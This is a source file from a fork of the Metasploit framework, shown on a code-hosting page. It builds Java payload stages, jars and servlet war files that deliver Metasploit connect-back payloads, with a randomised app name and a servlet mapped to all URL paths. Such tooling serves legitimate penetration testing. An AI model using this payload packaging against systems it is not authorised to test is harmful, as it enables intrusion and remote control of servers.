adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
0ae2e64bc56dd8543a97cc4ebc94de4738376488
metasploit-gs/lib/msf/core/payload/java.rb
T
OJ a773979992 Java config wiring, tweak to include block counts 
This commit adjusts the way that the config block is set for java and
android because behind the scenes the stageless connect-backs need to
know what to discard. as a result of connecting back to staged listeners
we need to be able to discard a number of bytes/blocks before we can
continue process (at least in the case of TCP).
2015-06-26 13:59:09 +10:00

112 lines
3.1 KiB
Ruby
Raw Blame History

# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::Java
#
# Used by stages; all java stages need to define +@stage_class_files+ as an
# array of .class files located in data/java/
#
# The staging protocol expects any number of class files, each prepended
# with its length, and terminated with a 0:
# [ 32-bit big endian length ][ first raw .class file]
# ...
# [ 32-bit big endian length ][ Nth raw .class file]
# [ 32-bit null ]
#
def generate_stage(opts={})
stage = ''
@stage_class_files.each do |path|
data = MetasploitPayloads.read('java', path)
stage << [data.length, data].pack('NA*')
end
stage << [0].pack('N')
stage
end
#
# Used by stagers to construct the payload jar file as a String
#
def generate
generate_jar.pack
end
#
# Used by stagers to create a jar file as a {Rex::Zip::Jar}. Stagers
# define a list of class files in @class_files which are pulled from the
# MetasploitPayloads gem. The configuration file is created by
# the payload's #config method.
#
# @option opts :main_class [String] the name of the Main-Class
# attribute in the manifest. Defaults to "metasploit.Payload"
# @option opts :random [Boolean] Set to `true` to randomize the
# "metasploit" package name.
# @return [Rex::Zip::Jar]
def generate_jar(opts={})
raise if not respond_to? :config
# Allow changing the jar's Main Class in the manifest so wrappers
# around metasploit.Payload will work.
main_class = opts[:main_class] || "metasploit.Payload"
paths = [
[ "metasploit", "Payload.class" ],
] + @class_files
jar = Rex::Zip::Jar.new
jar.add_sub("metasploit") if opts[:random]
jar.add_file("metasploit.dat", config)
jar.add_files(paths, MetasploitPayloads.path('java'))
jar.build_manifest(:main_class => main_class)
jar
end
#
# Like {#generate_jar}, this method is used by stagers to create a war file
# as a Rex::Zip::Jar object.
#
# @param opts [Hash]
# @option :app_name [String] Name of the \<servlet-name> attribute in the
# web.xml. Defaults to random
#
def generate_war(opts={})
raise if not respond_to? :config
zip = Rex::Zip::Jar.new
web_xml = %q{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>NAME</servlet-name>
<servlet-class>metasploit.PayloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>NAME</servlet-name>
<url-pattern>/*</url-pattern>
</servlet-mapping>
</web-app>
}
app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)
web_xml.gsub!(/NAME/, app_name)
paths = [
[ "metasploit", "Payload.class" ],
[ "metasploit", "PayloadServlet.class" ],
] + @class_files
zip.add_file('WEB-INF/', '')
zip.add_file('WEB-INF/web.xml', web_xml)
zip.add_file("WEB-INF/classes/", "")
zip.add_files(paths, MetasploitPayloads.path('java'), 'WEB-INF/classes/')
zip.add_file("WEB-INF/classes/metasploit.dat", config)
zip
end
end
Reference in New Issue View Git Blame Copy Permalink